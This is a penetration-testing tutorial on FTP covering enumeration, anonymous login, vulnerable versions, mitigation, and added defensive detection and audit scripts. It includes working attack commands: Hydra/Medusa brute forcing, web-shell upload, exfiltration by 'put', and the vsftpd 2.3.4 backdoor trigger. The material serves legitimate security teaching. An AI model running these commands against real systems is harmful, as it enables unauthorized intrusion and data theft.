FTP Services
File Transfer Protocol (FTP) is one of the oldest and most widely used protocols for transferring files between systems over a network. Despite its age and inherent security limitations, FTP remains common in many environments, making it an important target for penetration testers.
Protocol Overview
FTP operates using two channels:
Control Channel (Port 21): Handles commands and responses
Data Channel (Port 20 in active mode, or a random high port in passive mode): Transfers actual file data
Common Variants
FTP: Standard unencrypted FTP (Port 21)
FTPS: FTP with SSL/TLS encryption
SFTP: Not FTP, but a separate file transfer protocol that runs over SSH
Enumeration Techniques
Basic Port Scanning
# Identify FTP services
nmap -p 21 -sV <target>
# More comprehensive scan with scripts
nmap -p 21 --script=ftp-* <target>
Banner Grabbing
FTP servers typically display a banner upon connection that can reveal valuable information:
nc -nv <target> 21
telnet <target> 21
Example output:
220 ProFTPD 1.3.5a Server (FTP Server) [10.129.14.136]
This reveals software name and version information that can be used to identify potential vulnerabilities.
Authentication Methods
Anonymous Access
One of the most common misconfigurations is allowing anonymous access:
ftp <target>
Username: anonymous
Password: anonymous@domain.com
If successful, this grants access without valid credentials - a significant security issue.
Brute Force Attacks
When anonymous access is not available, credential brute forcing can be attempted:
# Using Hydra
hydra -L users.txt -P passwords.txt ftp://<target>
# Using Medusa
medusa -u user -P passwords.txt -h <target> -M ftp
Example Hydra execution:
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.129.14.136 ftp
[21][ftp] host: 10.129.14.136 login: user password: password123
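Seen from the server side, a run like the one above is a burst of failed logins from one address, sometimes ending in a success. The following detection sketch is an added example, not part of the original page; it assumes vsftpd-style `FAIL LOGIN` / `OK LOGIN` log lines, and the sample lines, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the style of vsftpd's log (not from the page).
SAMPLE_LOG = """\
Mon Aug  1 12:00:01 2022 [pid 4101] [user] FAIL LOGIN: Client "10.10.14.7"
Mon Aug  1 12:00:02 2022 [pid 4103] [user] FAIL LOGIN: Client "10.10.14.7"
Mon Aug  1 12:00:02 2022 [pid 4105] [alice] FAIL LOGIN: Client "192.168.1.20"
Mon Aug  1 12:00:03 2022 [pid 4107] [user] FAIL LOGIN: Client "10.10.14.7"
Mon Aug  1 12:00:04 2022 [pid 4109] [user] FAIL LOGIN: Client "10.10.14.7"
Mon Aug  1 12:00:05 2022 [pid 4111] [user] FAIL LOGIN: Client "10.10.14.7"
Mon Aug  1 12:00:09 2022 [pid 4113] [alice] OK LOGIN: Client "192.168.1.20"
Mon Aug  1 12:00:11 2022 [pid 4115] [user] OK LOGIN: Client "10.10.14.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

def parse(log_text):
    """Yield (timestamp, ip, user, result) for every login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["ip"], m["user"], m["result"]

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag an IP with >= threshold failures inside the window, and any
    successful login from an IP that was already flagged."""
    fails = defaultdict(list)  # ip -> failure timestamps still inside the window
    flagged, alerts = set(), []
    for ts, ip, user, result in parse(log_text):
        recent = [t for t in fails[ip] if ts - t <= window]
        if result == "FAIL":
            recent.append(ts)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user))
        elif ip in flagged:
            alerts.append(("success_after_bruteforce", ip, user))
        fails[ip] = recent
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The `success_after_bruteforce` alert is the one to escalate: it marks an account whose password should be treated as compromised.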
Common FTP Commands
Once authenticated, these commands are useful for interacting with the FTP server:
USER username: Authentication username
PASS password: Authentication password
HELP: Show available commands
PWD: Print working directory
DIR: List directory contents
CWD directory: Change working directory
GET filename: Download file
PUT filename: Upload file
PASV: Enable passive mode
QUIT: End session
Vulnerability Assessment
Common Vulnerabilities
Anonymous Authentication: Allows access without valid credentials
Cleartext Credentials: FTP transmits credentials in plaintext
Outdated Software: Many deployments run older versions with known vulnerabilities
Directory Traversal: Some implementations allow navigating outside intended directories
Brute Force Susceptibility: Often lacks account lockout mechanisms
Software-Specific Vulnerabilities
vsftpd 2.3.4: Backdoor vulnerability
ProFTPD < 1.3.5: Multiple RCE vulnerabilities
Pure-FTPd < 1.0.47: TLS/SSL vulnerabilities
FileZilla Server < 0.9.60: Multiple DoS vulnerabilities
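For inventory work, the table above can be applied to collected banners mechanically. The following is an added example, not part of the original page: it compares a 220 banner against the four rows exactly as listed, handling letter suffixes such as `1.3.5a`, `rc` pre-releases, and banners that hide the version. Banners other than the ProFTPD one shown earlier are constructed.

```python
import re

# Rows of the table above: (product, comparison, version, issue as listed on the page).
ADVISORIES = [
    ("vsftpd", "==", "2.3.4", "Backdoor vulnerability"),
    ("ProFTPD", "<", "1.3.5", "Multiple RCE vulnerabilities"),
    ("Pure-FTPd", "<", "1.0.47", "TLS/SSL vulnerabilities"),
    ("FileZilla Server", "<", "0.9.60", "Multiple DoS vulnerabilities"),
]
VERSION = r"(\d+(?:\.\d+)+(?:rc\d+|[a-z](?![a-z]))?)"

def version_key(version):
    """Sortable key so that '1.3.5rc3' < '1.3.5' < '1.3.5a'."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(rc\d+|[a-z])?", version.lower())
    nums = tuple(int(part) for part in m[1].split("."))
    suffix = m[2] or ""
    rank = -1 if suffix.startswith("rc") else (1 if suffix else 0)
    return nums, rank, suffix

def assess(banner):
    """Return (product, version, finding) for a banner, or None if unrecognised."""
    for product, op, ref, issue in ADVISORIES:
        pattern = re.escape(product) + r"(?:\s+version)?\s*" + VERSION + "?"
        m = re.search(pattern, banner, re.I)
        if not m:
            continue
        if m[1] is None:
            return product, None, "version not disclosed"
        key, ref_key = version_key(m[1]), version_key(ref)
        hit = key == ref_key if op == "==" else key < ref_key
        return product, m[1], issue if hit else "not listed"
    return None

if __name__ == "__main__":
    banners = [
        "220 ProFTPD 1.3.5a Server (FTP Server) [10.129.14.136]",  # from the page
        "220 (vsFTPd 2.3.4)",                                      # constructed
        "220 ProFTPD 1.3.5rc3 Server ready",                       # constructed
        "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------",  # constructed
    ]
    for banner in banners:
        print(assess(banner))
```

Banners can be edited by administrators and distributions backport fixes without changing the version string, so a match is a lead to verify against the installed package, not a confirmed finding.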
Data Exfiltration and Access
Retrieving Files
Once authenticated to an FTP server, files can be retrieved:
ftp> get sensitive_file.txt
For multiple files:
ftp> prompt off
ftp> mget *.txt
Uploading Files
If write permissions exist, this can be leveraged for exploitation:
ftp> put shell.php
For web servers that expose FTP directories, uploading web shells can lead to remote code execution.
Common Attack Scenarios
FTP Directory Exposure in Web Root
When FTP directories are accessible via web servers:
Authenticate to FTP
Upload web shell to FTP directory
Execute shell via web browser
Configuration File Access
FTP servers may expose sensitive configuration files:
ftp> get ftpusers
ftp> get user_list
ftp> get vsftpd.conf
These files often contain plaintext credentials or security settings.
Abusing FTP for Data Exfiltration
In environments with restricted outbound connections, FTP can sometimes be used to exfiltrate data:
# From compromised system
ftp> put stolen_data.zip
Misconfiguration Detection
Identifying Writable Directories
# Test ability to create directories
ftp> mkdir test
# Test file upload
ftp> put test.txt
Checking Permissions
# List files with permissions
ftp> ls -la
Example output:
drwxr-xr-x 2 user group 4096 Aug 1 12:00 .
drwxr-xr-x 4 user group 4096 Aug 1 12:00 ..
-rw-r--r-- 1 user group 1234 Aug 1 12:00 confidential.txt
Testing Directory Traversal
# Attempt to navigate outside intended directory
ftp> cd ../
ftp> cd /etc
FTP Penetration Testing Methodology
Discovery: Identify FTP services on the network
Banner Analysis: Gather version information
Authentication Testing: Try anonymous login, then credential attacks
Directory Enumeration: Map accessible directories and permissions
Configuration Review: Look for misconfigurations and security issues
Vulnerability Testing: Check for known vulnerabilities based on version
Exploitation: Attempt appropriate exploits
Post-Exploitation: Extract valuable information or establish persistence
Mitigation Strategies
When reporting FTP vulnerabilities, consider recommending:
Disable anonymous access unless explicitly required
Implement FTPS or SFTP instead of plain FTP
Restrict access to specific IP addresses
Implement strong password policies
Run FTP servers in chroot environments
Keep server software updated
Implement file integrity monitoring
Consider modern alternatives to FTP
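Several of these recommendations can be checked directly in a server's configuration. The following audit sketch for `vsftpd.conf` is an added example, not part of the original page; the option names and defaults are vsftpd's own, while the two sample configs are constructed. It shows one case that is easy to miss: a config that never mentions `anonymous_enable` still allows anonymous login, because the default is YES.

```python
# vsftpd's built-in defaults for the options checked here (see vsftpd.conf(5)).
DEFAULTS = {
    "anonymous_enable": "YES", "anon_upload_enable": "NO", "write_enable": "NO",
    "local_enable": "NO", "chroot_local_user": "NO", "ssl_enable": "NO",
    "force_local_logins_ssl": "YES",
}

# Constructed sample configs (not from the page). WEAK never mentions
# anonymous_enable, so the YES default applies.
WEAK = """\
local_enable=YES
write_enable=YES
anon_upload_enable=YES
"""
HARDENED = """\
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
ssl_enable=YES
force_local_logins_ssl=YES
"""

def load(text):
    """Parse option=value lines on top of the defaults; '#' starts a comment line."""
    conf = dict(DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key] = value
    return conf

def audit(text):
    """Return (option, recommendation) pairs for settings that contradict the list above."""
    conf = load(text)
    on = lambda key: conf[key].strip().upper() in ("YES", "TRUE", "1")
    findings = []
    if on("anonymous_enable"):
        findings.append(("anonymous_enable", "Disable anonymous access unless explicitly required"))
        if on("anon_upload_enable") and on("write_enable"):
            findings.append(("anon_upload_enable", "Anonymous upload is enabled; remove write access"))
    if on("local_enable"):
        if not (on("ssl_enable") and on("force_local_logins_ssl")):
            findings.append(("ssl_enable", "Implement FTPS or SFTP instead of plain FTP"))
        if not on("chroot_local_user"):
            findings.append(("chroot_local_user", "Run FTP servers in chroot environments"))
    return findings
```

`audit(WEAK)` reports all four findings and `audit(HARDENED)` reports none; the chroot check does not model `chroot_list_enable`, which inverts the meaning of `chroot_local_user` for listed users.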
Practical Commands for FTP Testing
Automating Anonymous Access Checks
# Create a script to test multiple hosts
while read -r ip; do
    echo "Testing $ip"
    # -n disables auto-login, so the login is sent as an explicit "user" command
    printf 'user anonymous anonymous@domain.com\nquit\n' | timeout 3 ftp -n "$ip" 2>/dev/null
done < targets.txt
Downloading All Files Recursively
# Using wget for recursive download
wget -r ftp://anonymous:anonymous@<target>
Testing Command Execution Vulnerabilities
For vulnerable versions like vsftpd 2.3.4:
# Triggering backdoor
telnet <target> 21
USER backdoor:)
PASS any
By understanding FTP services and their security implications, penetration testers can effectively identify and exploit misconfigurations and vulnerabilities in these systems.